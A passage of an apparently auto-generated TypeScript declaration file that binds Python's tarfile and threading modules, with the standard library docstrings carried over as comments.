fileobj }: { name, mode?, fileobj?}): Promise<any>\n\n\t\t/**\n\t\t * Open gzip compressed tar archive name for reading or writing.\n\t\t * Appending is not allowed.\n\t\t * \n\t\t */\n\t\tgzopen(name, mode?, fileobj?, compresslevel?): Promise<any>\n\t\tgzopen$({ name, mode, fileobj, compresslevel }: { name, mode?, fileobj?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Open bzip2 compressed tar archive name for reading or writing.\n\t\t * Appending is not allowed.\n\t\t * \n\t\t */\n\t\tbz2open(name, mode?, fileobj?, compresslevel?): Promise<any>\n\t\tbz2open$({ name, mode, fileobj, compresslevel }: { name, mode?, fileobj?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Open lzma compressed tar archive name for reading or writing.\n\t\t * Appending is not allowed.\n\t\t * \n\t\t */\n\t\txzopen(name, mode?, fileobj?, preset?): Promise<any>\n\t\txzopen$({ name, mode, fileobj, preset }: { name, mode?, fileobj?, preset?}): Promise<any>\n\n\t\t/**\n\t\t * Close the TarFile. In write-mode, two finishing zero blocks are\n\t\t * appended to the archive.\n\t\t * \n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a TarInfo object for member `name'. If `name' can not be\n\t\t * found in the archive, KeyError is raised. If a member occurs more\n\t\t * than once in the archive, its last occurrence is assumed to be the\n\t\t * most up-to-date version.\n\t\t * \n\t\t */\n\t\tgetmember(name): Promise<any>\n\t\tgetmember$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Return the members of the archive as a list of TarInfo objects. The\n\t\t * list has the same order as the members in the archive.\n\t\t * \n\t\t */\n\t\tgetmembers(): Promise<any>\n\t\tgetmembers$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the members of the archive as a list of their names. It has\n\t\t * the same order as the list returned by getmembers().\n\t\t * \n\t\t */\n\t\tgetnames(): Promise<any>\n\t\tgetnames$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create a TarInfo object from the result of os.stat or equivalent\n\t\t * on an existing file. The file is either named by `name', or\n\t\t * specified as a file object `fileobj' with a file descriptor. If\n\t\t * given, `arcname' specifies an alternative name for the file in the\n\t\t * archive, otherwise, the name is taken from the 'name' attribute of\n\t\t * 'fileobj', or the 'name' argument. The name should be a text\n\t\t * string.\n\t\t * \n\t\t */\n\t\tgettarinfo(name?, arcname?, fileobj?): Promise<any>\n\t\tgettarinfo$({ name, arcname, fileobj }: { name?, arcname?, fileobj?}): Promise<any>\n\n\t\t/**\n\t\t * Print a table of contents to sys.stdout. If `verbose' is False, only\n\t\t * the names of the members are printed. If it is True, an `ls -l'-like\n\t\t * output is produced. `members' is optional and must be a subset of the\n\t\t * list returned by getmembers().\n\t\t * \n\t\t */\n\t\tlist(verbose?: boolean): Promise<any>\n\t\tlist$({ verbose }: { verbose?}): Promise<any>\n\n\t\t/**\n\t\t * Add the file `name' to the archive. `name' may be any type of file\n\t\t * (directory, fifo, symbolic link, etc.). If given, `arcname'\n\t\t * specifies an alternative name for the file in the archive.\n\t\t * Directories are added recursively by default. This can be avoided by\n\t\t * setting `recursive' to False. `filter' is a function\n\t\t * that expects a TarInfo object argument and returns the changed\n\t\t * TarInfo object, if it returns None the TarInfo object will be\n\t\t * excluded from the archive.\n\t\t * \n\t\t */\n\t\tadd(name, arcname?, recursive?: boolean): Promise<any>\n\t\tadd$({ name, arcname, recursive }: { name, arcname?, recursive?}): Promise<any>\n\n\t\t/**\n\t\t * Add the TarInfo object `tarinfo' to the archive. If `fileobj' is\n\t\t * given, it should be a binary file, and tarinfo.size bytes are read\n\t\t * from it and added to the archive. You can create TarInfo objects\n\t\t * directly, or by using gettarinfo().\n\t\t * \n\t\t */\n\t\taddfile(tarinfo, fileobj?): Promise<any>\n\t\taddfile$({ tarinfo, fileobj }: { tarinfo, fileobj?}): Promise<any>\n\n\t\t/**\n\t\t * Extract all members from the archive to the current working\n\t\t * directory and set owner, modification time and permissions on\n\t\t * directories afterwards. `path' specifies a different directory\n\t\t * to extract to. `members' is optional and must be a subset of the\n\t\t * list returned by getmembers(). If `numeric_owner` is True, only\n\t\t * the numbers for user/group names are used and not the names.\n\t\t * \n\t\t */\n\t\textractall(path?, members?): Promise<any>\n\t\textractall$({ path, members }: { path?, members?}): Promise<any>\n\n\t\t/**\n\t\t * Extract a member from the archive to the current working directory,\n\t\t * using its full name. Its file information is extracted as accurately\n\t\t * as possible. `member' may be a filename or a TarInfo object. You can\n\t\t * specify a different directory using `path'. File attributes (owner,\n\t\t * mtime, mode) are set unless `set_attrs' is False. If `numeric_owner`\n\t\t * is True, only the numbers for user/group names are used and not\n\t\t * the names.\n\t\t * \n\t\t */\n\t\textract(member, path?, set_attrs?: boolean): Promise<any>\n\t\textract$({ member, path, set_attrs }: { member, path?, set_attrs?}): Promise<any>\n\n\t\t/**\n\t\t * Extract a member from the archive as a file object. `member' may be\n\t\t * a filename or a TarInfo object. If `member' is a regular file or\n\t\t * a link, an io.BufferedReader object is returned. For all other\n\t\t * existing members, None is returned. If `member' does not appear\n\t\t * in the archive, KeyError is raised.\n\t\t * \n\t\t */\n\t\textractfile(member): Promise<any>\n\t\textractfile$({ member }): Promise<any>\n\n\t\t/**\n\t\t * Make a directory called targetpath.\n\t\t * \n\t\t */\n\t\tmakedir(tarinfo, targetpath): Promise<any>\n\t\tmakedir$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a file called targetpath.\n\t\t * \n\t\t */\n\t\tmakefile(tarinfo, targetpath): Promise<any>\n\t\tmakefile$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a file from a TarInfo object with an unknown type\n\t\t * at targetpath.\n\t\t * \n\t\t */\n\t\tmakeunknown(tarinfo, targetpath): Promise<any>\n\t\tmakeunknown$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a fifo called targetpath.\n\t\t * \n\t\t */\n\t\tmakefifo(tarinfo, targetpath): Promise<any>\n\t\tmakefifo$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a character or block device called targetpath.\n\t\t * \n\t\t */\n\t\tmakedev(tarinfo, targetpath): Promise<any>\n\t\tmakedev$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a (symbolic) link called targetpath. If it cannot be created\n\t\t * (platform limitation), we try to make a copy of the referenced file\n\t\t * instead of a link.\n\t\t * \n\t\t */\n\t\tmakelink(tarinfo, targetpath): Promise<any>\n\t\tmakelink$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Set owner of targetpath according to tarinfo. If numeric_owner\n\t\t * is True, use .gid/.uid instead of .gname/.uname. If numeric_owner\n\t\t * is False, fall back to .gid/.uid when the search based on name\n\t\t * fails.\n\t\t * \n\t\t */\n\t\tchown(tarinfo, targetpath, numeric_owner): Promise<any>\n\t\tchown$({ tarinfo, targetpath, numeric_owner }): Promise<any>\n\n\t\t/**\n\t\t * Set file permissions of targetpath according to tarinfo.\n\t\t * \n\t\t */\n\t\tchmod(tarinfo, targetpath): Promise<any>\n\t\tchmod$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Set modification time of targetpath according to tarinfo.\n\t\t * \n\t\t */\n\t\tutime(tarinfo, targetpath): Promise<any>\n\t\tutime$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Return the next member of the archive as a TarInfo object, when\n\t\t * TarFile is opened for reading. Return None if there is no more\n\t\t * available.\n\t\t * \n\t\t */\n\t\tnext(): Promise<any>\n\t\tnext$($: {}): Promise<any>\n\t\tdebug\n\t\tdereference\n\t\tignore_zeros\n\t\terrorlevel\n\t\tformat\n\t\tencoding\n\t\terrors\n\t\ttarinfo\n\t\tfileobject\n\t\tOPEN_METH\n\t}\n\tlet version: Promise<any>\n\tlet symlink_exception: Promise<any>\n\tlet NUL: Promise<any>\n\tlet BLOCKSIZE: Promise<any>\n\tlet RECORDSIZE: Promise<any>\n\tlet GNU_MAGIC: Promise<any>\n\tlet POSIX_MAGIC: Promise<any>\n\tlet LENGTH_NAME: Promise<any>\n\tlet LENGTH_LINK: Promise<any>\n\tlet LENGTH_PREFIX: Promise<any>\n\tlet REGTYPE: Promise<any>\n\tlet AREGTYPE: Promise<any>\n\tlet LNKTYPE: Promise<any>\n\tlet SYMTYPE: Promise<any>\n\tlet CHRTYPE: Promise<any>\n\tlet BLKTYPE: Promise<any>\n\tlet DIRTYPE: Promise<any>\n\tlet FIFOTYPE: Promise<any>\n\tlet CONTTYPE: Promise<any>\n\tlet GNUTYPE_LONGNAME: Promise<any>\n\tlet GNUTYPE_LONGLINK: Promise<any>\n\tlet GNUTYPE_SPARSE: Promise<any>\n\tlet XHDTYPE: Promise<any>\n\tlet XGLTYPE: Promise<any>\n\tlet SOLARIS_XHDTYPE: Promise<any>\n\tlet USTAR_FORMAT: Promise<any>\n\tlet GNU_FORMAT: Promise<any>\n\tlet PAX_FORMAT: Promise<any>\n\tlet DEFAULT_FORMAT: Promise<any>\n\tlet SUPPORTED_TYPES: Promise<any>\n\tlet REGULAR_TYPES: Promise<any>\n\tlet GNU_TYPES: Promise<any>\n\tlet PAX_FIELDS: Promise<any>\n\tlet PAX_NAME_FIELDS: Promise<any>\n\tlet PAX_NUMBER_FIELDS: Promise<any>\n\tlet ENCODING: Promise<any>\n}\ndeclare module threading {\n\tvar _\n\n\t/**\n\t * Set a profile function for all threads started from the threading module.\n\t * \n\t * The func will be passed to sys.setprofile() for each thread, before its\n\t * run() method is called.\n\t * \n\t * \n\t */\n\tfunction setprofile(func): Promise<any>\n\tfunction setprofile$({ func }): Promise<any>\n\n\t/**\n\t * Get the profiler function as set by threading.setprofile().\n\t */\n\tfunction getprofile(): Promise<any>\n\tfunction getprofile$($: {}): Promise<any>\n\n\t/**\n\t * Set a trace function for all threads started from the threading module.\n\t * \n\t * The func will be passed to sys.settrace() for each thread, before its run()\n\t * method is called.\n\t * \n\t * \n\t */\n\tfunction settrace(func): Promise<any>\n\tfunction settrace$({ func }): Promise<any>\n\n\t/**\n\t * Get the trace function as set by threading.settrace().\n\t */\n\tfunction gettrace(): Promise<any>\n\tfunction gettrace$($: {}): Promise<any>\n\n\t/**\n\t * Factory function that returns a new reentrant lock.\n\t * \n\t * A reentrant lock must be released by the thread that acquired it. Once a\n\t * thread has acquired a reentrant lock, the same thread may acquire it again\n\t * without blocking; the thread must release it once for each time it has\n\t * acquired it.\n\t * \n\t * \n\t */\n\tfunction RLock(): Promise<any>\n\tfunction RLock$($: {}): Promise<any>\n\n\t/**\n\t * Return the current Thread object, corresponding to the caller's thread of control.\n\t * \n\t * If the caller's thread of control was not created through the threading\n\t * module, a dummy thread object with limited functionality is returned.\n\t * \n\t * \n\t */\n\tfunction current_thread(): Promise<any>\n\tfunction current_thread$($: {}): Promise<any>\n\n\t/**\n\t * Return the current Thread object, corresponding to the caller's thread of control.\n\t * \n\t * This function is deprecated, use current_thread() instead.\n\t * \n\t * \n\t */\n\tfunction currentThread(): Promise<any>\n\tfunction currentThread$($: {}): Promise<any>\n\n\t/**\n\t * Return the number of Thread objects currently alive.\n\t * \n\t * The returned count is equal to the length of the list returned by\n\t * enumerate().\n\t * \n\t * \n\t */\n\tfunction active_count(): Promise<any>\n\tfunction active_count$($: {}): Promise<any>\n\n\t/**\n\t * Return the number of Thread objects currently alive.\n\t * \n\t * This function is deprecated, use active_count() instead.\n\t * \n\t * \n\t */\n\tfunction activeCount(): Promise<any>\n\tfunction activeCount$($: {}): Promise<any>\n\n\t/**\n\t * Return a list of all Thread objects currently alive.\n\t * \n\t * The list includes daemonic threads, dummy thread objects created by\n\t * current_thread(), and the main thread. It excludes terminated threads and\n\t * threads that have not yet been started.\n\t * \n\t * \n\t */\n\tfunction enumerate(): Promise<any>\n\tfunction enumerate$($: {}): Promise<any>\n\n\t/**\n\t * Return the main thread object.\n\t * \n\t * In normal conditions, the main thread is the thread from which the\n\t * Python interpreter was started.\n\t * \n\t */\n\tfunction main_thread(): Promise<any>\n\tfunction main_thread$($: {}): Promise<any>\n\n\t/**\n\t * This class implements reentrant lock objects.\n\t * \n\t * A reentrant lock must be released by the thread that acquired it. Once a\n\t * thread has acquired a reentrant lock, the same thread may acquire it\n\t * again without blocking; the thread must release it once for each time it\n\t * has acquired it.\n\t * \n\t * \n\t */\n\tinterface I_RLock {\n\n\t\t/**\n\t\t * Acquire a lock, blocking or non-blocking.\n\t\t * \n\t\t * When invoked without arguments: if this thread already owns the lock,\n\t\t * increment the recursion level by one, and return immediately. Otherwise,\n\t\t * if another thread owns the lock, block until the lock is unlocked. Once\n\t\t * the lock is unlocked (not owned by any thread), then grab ownership, set\n\t\t * the recursion level to one, and return. If more than one thread is\n\t\t * blocked waiting until the lock is unlocked, only one at a time will be\n\t\t * able to grab ownership of the lock. There is no return value in this\n\t\t * case.\n\t\t * \n\t\t * When invoked with the blocking argument set to true, do the same thing\n\t\t * as when called without arguments, and return true.\n\t\t * \n\t\t * When invoked with the blocking argument set to false, do not block. If a\n\t\t * call without an argument would block, return false immediately;\n\t\t * otherwise, do the same thing as when called without arguments, and\n\t\t * return true.\n\t\t * \n\t\t * When invoked with the floating-point timeout argument set to a positive\n\t\t * value, block for at most the number of seconds specified by timeout\n\t\t * and as long as the lock cannot be acquired. Return true if the lock has\n\t\t * been acquired, false if the timeout has elapsed.\n\t\t * \n\t\t * \n\t\t */\n\t\tacquire(blocking?: boolean, timeout?): Promise<any>\n\t\tacquire$({ blocking, timeout }: { blocking?, timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Release a lock, decrementing the recursion level.\n\t\t * \n\t\t * If after the decrement it is zero, reset the lock to unlocked (not owned\n\t\t * by any thread), and if any other threads are blocked waiting for the\n\t\t * lock to become unlocked, allow exactly one of them to proceed. If after\n\t\t * the decrement the recursion level is still nonzero, the lock remains\n\t\t * locked and owned by the calling thread.\n\t\t * \n\t\t * Only call this method when the calling thread owns the lock. A\n\t\t * RuntimeError is raised if this method is called when the lock is\n\t\t * unlocked.\n\t\t * \n\t\t * There is no return value.\n\t\t * \n\t\t * \n\t\t */\n\t\trelease(): Promise<any>\n\t\trelease$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Class that implements a condition variable.\n\t * \n\t * A condition variable allows one or more threads to wait until they are\n\t * notified by another thread.\n\t * \n\t * If the lock argument is given and not None, it must be a Lock or RLock\n\t * object, and it is used as the underlying lock. Otherwise, a new RLock object\n\t * is created and used as the underlying lock.\n\t * \n\t * \n\t */\n\tfunction Condition(lock?): Promise<ICondition>\n\tfunction Condition$({ lock }: { lock?}): Promise<ICondition>\n\tinterface ICondition {\n\n\t\t/**\n\t\t * Wait until notified or until a timeout occurs.\n\t\t * \n\t\t * If the calling thread has not acquired the lock when this method is\n\t\t * called, a RuntimeError is raised.\n\t\t * \n\t\t * This method releases the underlying lock, and then blocks until it is\n\t\t * awakened by a notify() or notify_all() call for the same condition\n\t\t * variable in another thread, or until the optional timeout occurs. Once\n\t\t * awakened or timed out, it re-acquires the lock and returns.\n\t\t * \n\t\t * When the timeout argument is present and not None, it should be a\n\t\t * floating point number specifying a timeout for the operation in seconds\n\t\t * (or fractions thereof).\n\t\t * \n\t\t * When the underlying lock is an RLock, it is not released using its\n\t\t * release() method, since this may not actually unlock the lock when it\n\t\t * was acquired multiple times recursively. Instead, an internal interface\n\t\t * of the RLock class is used, which really unlocks it even when it has\n\t\t * been recursively acquired several times. Another internal interface is\n\t\t * then used to restore the recursion level when the lock is reacquired.\n\t\t * \n\t\t * \n\t\t */\n\t\twait(timeout?): Promise<any>\n\t\twait$({ timeout }: { timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Wait until a condition evaluates to True.\n\t\t * \n\t\t * predicate should be a callable which result will be interpreted as a\n\t\t * boolean value. A timeout may be provided giving the maximum time to\n\t\t * wait.\n\t\t * \n\t\t * \n\t\t */\n\t\twait_for(predicate, timeout?): Promise<any>\n\t\twait_for$({ predicate, timeout }: { predicate, timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Wake up one or more threads waiting on this condition, if any.\n\t\t * \n\t\t * If the calling thread has not acquired the lock when this method is\n\t\t * called, a RuntimeError is raised.\n\t\t * \n\t\t * This method wakes up at most n of the threads waiting for the condition\n\t\t * variable; it is a no-op if no threads are waiting.\n\t\t * \n\t\t * \n\t\t */\n\t\tnotify(n?): Promise<any>\n\t\tnotify$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Wake up all threads waiting on this condition.\n\t\t * \n\t\t * If the calling thread has not acquired the lock when this method\n\t\t * is called, a RuntimeError is raised.\n\t\t * \n\t\t * \n\t\t */\n\t\tnotify_all(): Promise<any>\n\t\tnotify_all$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wake up all threads waiting on this condition.\n\t\t * \n\t\t * This method is deprecated, use notify_all() instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tnotifyAll(): Promise<any>\n\t\tnotifyAll$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * This class implements semaphore objects.\n\t * \n\t * Semaphores manage a counter representing the number of release() calls minus\n\t * the number of acquire() calls, plus an initial value. The acquire() method\n\t * blocks if necessary until it can return without making the counter\n\t * negative. If not given, value defaults to 1.\n\t * \n\t * \n\t */\n\tfunction Semaphore(value?): Promise<ISemaphore>\n\tfunction Semaphore$({ value }: { value?}): Promise<ISemaphore>\n\tinterface ISemaphore {\n\n\t\t/**\n\t\t * Acquire a semaphore, decrementing the internal counter by one.\n\t\t * \n\t\t * When invoked without arguments: if the internal counter is larger than\n\t\t * zero on entry, decrement it by one and return immediately. If it is zero\n\t\t * on entry, block, waiting until some other thread has called release() to\n\t\t * make it larger than zero. This is done with proper interlocking so that\n\t\t * if multiple acquire() calls are blocked, release() will wake exactly one\n\t\t * of them up. The implementation may pick one at random, so the order in\n\t\t * which blocked threads are awakened should not be relied on. There is no\n\t\t * return value in this case.\n\t\t * \n\t\t * When invoked with blocking set to true, do the same thing as when called\n\t\t * without arguments, and return true.\n\t\t * \n\t\t * When invoked with blocking set to false, do not block. If a call without\n\t\t * an argument would block, return false immediately; otherwise, do the\n\t\t * same thing as when called without arguments, and return true.\n\t\t * \n\t\t * When invoked with a timeout other than None, it will block for at\n\t\t * most timeout seconds. If acquire does not complete successfully in\n\t\t * that interval, return false. Return true otherwise.\n\t\t * \n\t\t * \n\t\t */\n\t\tacquire(blocking?: boolean, timeout?): Promise<any>\n\t\tacquire$({ blocking, timeout }: { blocking?, timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Release a semaphore, incrementing the internal counter by one or more.\n\t\t * \n\t\t * When the counter is zero on entry and another thread is waiting for it\n\t\t * to become larger than zero again, wake up that thread.\n\t\t * \n\t\t * \n\t\t */\n\t\trelease(n?): Promise<any>\n\t\trelease$({ n }: { n?}): Promise<any>\n\t}\n\n\t/**\n\t * Implements a bounded semaphore.\n\t * \n\t * A bounded semaphore checks to make sure its current value doesn't exceed its\n\t * initial value. If it does, ValueError is raised. In most situations\n\t * semaphores are used to guard resources with limited capacity.\n\t * \n\t * If the semaphore is released too many times it's a sign of a bug. If not\n\t * given, value defaults to 1.\n\t * \n\t * Like regular semaphores, bounded semaphores manage a counter representing\n\t * the number of release() calls minus the number of acquire() calls, plus an\n\t * initial value. The acquire() method blocks if necessary until it can return\n\t * without making the counter negative. If not given, value defaults to 1.\n\t * \n\t * \n\t */\n\tfunction BoundedSemaphore(value?): Promise<IBoundedSemaphore>\n\tfunction BoundedSemaphore$({ value }: { value?}): Promise<IBoundedSemaphore>\n\tinterface IBoundedSemaphore extends ISemaphore {\n\n\t\t/**\n\t\t * Release a semaphore, incrementing the internal counter by one or more.\n\t\t * \n\t\t * When the counter is zero on entry and another thread is waiting for it\n\t\t * to become larger than zero again, wake up that thread.\n\t\t * \n\t\t * If the number of releases exceeds the number of acquires,\n\t\t * raise a ValueError.\n\t\t * \n\t\t * \n\t\t */\n\t\trelease(n?): Promise<any>\n\t\trelease$({ n }: { n?}): Promise<any>\n\t}\n\n\t/**\n\t * Class implementing event objects.\n\t * \n\t * Events manage a flag that can be set to true with the set() method and reset\n\t * to false with the clear() method. The wait() method blocks until the flag is\n\t * true. The flag is initially false.\n\t * \n\t * \n\t */\n\tfunction Event(): Promise<IEvent>\n\tfunction Event$({ }): Promise<IEvent>\n\tinterface IEvent {\n\n\t\t/**\n\t\t * Return true if and only if the internal flag is true.\n\t\t */\n\t\tis_set(): Promise<any>\n\t\tis_set$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return true if and only if the internal flag is true.\n\t\t * \n\t\t * This method is deprecated, use notify_all() instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tisSet(): Promise<any>\n\t\tisSet$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the internal flag to true.\n\t\t * \n\t\t * All threads waiting for it to become true are awakened. Threads\n\t\t * that call wait() once the flag is true will not block at all.\n\t\t * \n\t\t * \n\t\t */\n\t\tset(): Promise<any>\n\t\tset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Reset the internal flag to false.\n\t\t * \n\t\t * Subsequently, threads calling wait() will block until set() is called to\n\t\t * set the internal flag to true again.\n\t\t * \n\t\t * \n\t\t */\n\t\tclear(): Promise<any>\n\t\tclear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Block until the internal flag is true.\n\t\t * \n\t\t * If the internal flag is true on entry, return immediately. Otherwise,\n\t\t * block until another thread calls set() to set the flag to true, or until\n\t\t * the optional timeout occurs.\n\t\t * \n\t\t * When the timeout argument is present and not None, it should be a\n\t\t * floating point number specifying a timeout for the operation in seconds\n\t\t * (or fractions thereof).\n\t\t * \n\t\t * This method returns the internal flag on exit, so it will always return\n\t\t * True except if a timeout is given and the operation times out.\n\t\t * \n\t\t * \n\t\t */\n\t\twait(timeout?): Promise<any>\n\t\twait$({ timeout }: { timeout?}): Promise<any>\n\t}\n\n\t/**\n\t * Implements a Barrier.\n\t * \n\t * Useful for synchronizing a fixed number of threads at known synchronization\n\t * points. Threads block on 'wait()' and are simultaneously awoken once they\n\t * have all made that call.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Create a barrier, initialised to 'parties' threads.\n\t * \n\t * 'action' is a callable which, when supplied, will be called by one of\n\t * the threads after they have all entered the barrier and just prior to\n\t * releasing them all. If a 'timeout' is provided, it is used as the\n\t * default for all subsequent 'wait()' calls.\n\t * \n\t * \n\t */\n\tfunction Barrier(parties, action?, timeout?): Promise<IBarrier>\n\tfunction Barrier$({ parties, action, timeout }: { parties, action?, timeout?}): Promise<IBarrier>\n\tinterface IBarrier {\n\n\t\t/**\n\t\t * Wait for the barrier.\n\t\t * \n\t\t * When the specified number of threads have started waiting, they are all\n\t\t * simultaneously awoken. If an 'action' was provided for the barrier, one\n\t\t * of the threads will have executed that callback prior to returning.\n\t\t * Returns an individual index number from 0 to 'parties-1'.\n\t\t * \n\t\t * \n\t\t */\n\t\twait(timeout?): Promise<any>\n\t\twait$({ timeout }: { timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Reset the barrier to the initial state.\n\t\t * \n\t\t * Any threads currently waiting will get the BrokenBarrier exception\n\t\t * raised.\n\t\t * \n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Place the barrier into a 'broken' state.\n\t\t * \n\t\t * Useful in case of error. Any currently waiting threads and threads\n\t\t * attempting to 'wait()' will have BrokenBarrierError raised.\n\t\t * \n\t\t * \n\t\t */\n\t\tabort(): Promise<any>\n\t\tabort$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of threads required to trip the barrier.\n\t\t */\n\t\tparties(): Promise<any>\n\t\tparties$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of threads currently waiting at the barrier.\n\t\t */\n\t\tn_waiting(): Promise<any>\n\t\tn_waiting$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if the barrier is in a broken state.\n\t\t */\n\t\tbroken(): Promise<any>\n\t\tbroken$($: {}): Promise<any>\n\t}\n\tinterface IBrokenBarrierError {\n\t}\n\n\t/**\n\t * A class that represents a thread of control.\n\t * \n\t * This class can be safely subclassed in a limited fashion. There are two ways\n\t * to specify the activity: by passing a callable object to the constructor, or\n\t * by overriding the run() method in a subclass.\n\t * \n\t * \n\t */\n\n\t/**\n\t * This constructor should always be called with keyword arguments. Arguments are:\n\t * \n\t * *group* should be None; reserved for future extension when a ThreadGroup\n\t * class is implemented.\n\t * \n\t * *target* is the callable object to be invoked by the run()\n\t * method. Defaults to None, meaning nothing is called.\n\t * \n\t * *name* is the thread name. By default, a unique name is constructed of\n\t * the form \"Thread-N\" where N is a small decimal number.\n\t * \n\t * *args* is the argument tuple for the target invocation. Defaults to ().\n\t * \n\t * *kwargs* is a dictionary of keyword arguments for the target\n\t * invocation. Defaults to {}.\n\t * \n\t * If a subclass overrides the constructor, it must make sure to invoke\n\t * the base class constructor (Thread.__init__()) before doing anything\n\t * else to the thread.\n\t * \n\t * \n\t */\n\tfunction Thread(group?, target?, name?, args?, kwargs?): Promise<IThread>\n\tfunction Thread$({ group, target, name, args, kwargs }: { group?, target?, name?, args?, kwargs?}): Promise<IThread>\n\tinterface IThread {\n\n\t\t/**\n\t\t * Start the thread's activity.\n\t\t * \n\t\t * It must be called at most once per thread object. It arranges for the\n\t\t * object's run() method to be invoked in a separate thread of control.\n\t\t * \n\t\t * This method will raise a RuntimeError if called more than once on the\n\t\t * same thread object.\n\t\t * \n\t\t * \n\t\t */\n\t\tstart(): Promise<any>\n\t\tstart$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Method representing the thread's activity.\n\t\t * \n\t\t * You may override this method in a subclass. The standard run() method\n\t\t * invokes the callable object passed to the object's constructor as the\n\t\t * target argument, if any, with sequential and keyword arguments taken\n\t\t * from the args and kwargs arguments, respectively.\n\t\t * \n\t\t * \n\t\t */\n\t\trun(): Promise<any>\n\t\trun$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wait until the thread terminates.\n\t\t * \n\t\t * This blocks the calling thread until the thread whose join() method is\n\t\t * called terminates -- either normally or through an unhandled exception\n\t\t * or until the optional timeout occurs.\n\t\t * \n\t\t * When the timeout argument is present and not None, it should be a\n\t\t * floating point number specifying a timeout for the operation in seconds\n\t\t * (or fractions thereof). As join() always returns None, you must call\n\t\t * is_alive() after join() to decide whether a timeout happened -- if the\n\t\t * thread is still alive, the join() call timed out.\n\t\t * \n\t\t * When the timeout argument is not present or None, the operation will\n\t\t * block until the thread terminates.\n\t\t * \n\t\t * A thread can be join()ed many times.\n\t\t * \n\t\t * join() raises a RuntimeError if an attempt is made to join the current\n\t\t * thread as that would cause a deadlock. It is also an error to join() a\n\t\t * thread before it has been started and attempts to do so raises the same\n\t\t * exception.\n\t\t * \n\t\t * \n\t\t */\n\t\tjoin(timeout?): Promise<any>\n\t\tjoin$({ timeout }: { timeout?}): Promise<any>\n\n\t\t/**\n\t\t * A string used for identification purposes only.\n\t\t * \n\t\t * It has no semantics. Multiple threads may be given the same name. The\n\t\t * initial name is set by the constructor.\n\t\t * \n\t\t * \n\t\t */\n\t\tname(): Promise<any>\n\t\tname$($: {}): Promise<any>\n\t\tname(name): Promise<any>\n\t\tname$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Thread identifier of this thread or None if it has not been started.\n\t\t * \n\t\t * This is a nonzero integer. See the get_ident() function. Thread\n\t\t * identifiers may be recycled when a thread exits and another thread is\n\t\t * created. The identifier is available even after the thread has exited.\n\t\t * \n\t\t * \n\t\t */\n\t\tident(): Promise<any>\n\t\tident$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return whether the thread is alive.\n\t\t * \n\t\t * This method returns True just before the run() method starts until just\n\t\t * after the run() method terminates. See also the module function\n\t\t * enumerate().\n\t\t * \n\t\t * \n\t\t */\n\t\tis_alive(): Promise<any>\n\t\tis_alive$($: {}): Promise<any>\n\n\t\t/**\n\t\t * A boolean value indicating whether this thread is a daemon thread.\n\t\t * \n\t\t * This must be set before start() is called, otherwise RuntimeError is\n\t\t * raised. Its initial value is inherited from the creating thread; the\n\t\t * main thread is not a daemon thread and therefore all threads created in\n\t\t * the main thread default to daemon = False.\n\t\t * \n\t\t * The entire Python program exits when only daemon threads are left.\n\t\t * \n\t\t * \n\t\t */\n\t\tdaemon(): Promise<any>\n\t\tdaemon$($: {}): Promise<any>\n\t\tdaemon(daemonic): Promise<any>\n\t\tdaemon$({ daemonic }): Promise<any>\n\n\t\t/**\n\t\t * Return whether this thread is a daemon.\n\t\t * \n\t\t * This method is deprecated, use the daemon attribute instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tisDaemon(): Promise<any>\n\t\tisDaemon$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set whether this thread is a daemon.\n\t\t * \n\t\t * This method is deprecated, use the .daemon property instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tsetDaemon(daemonic): Promise<any>\n\t\tsetDaemon$({ daemonic }): Promise<any>\n\n\t\t/**\n\t\t * Return a string used for identification purposes only.\n\t\t * \n\t\t * This method is deprecated, use the name attribute instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tgetName(): Promise<any>\n\t\tgetName$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the name string for this thread.\n\t\t * \n\t\t * This method is deprecated, use the name attribute instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tsetName(name): Promise<any>\n\t\tsetName$({ name }): Promise<any>\n\t}\n\n\t/**\n\t * Call a function after a specified number of seconds:\n\t * \n\t * t = Timer(30.0, f, args=None, kwargs=None)\n\t * t.start()\n\t * 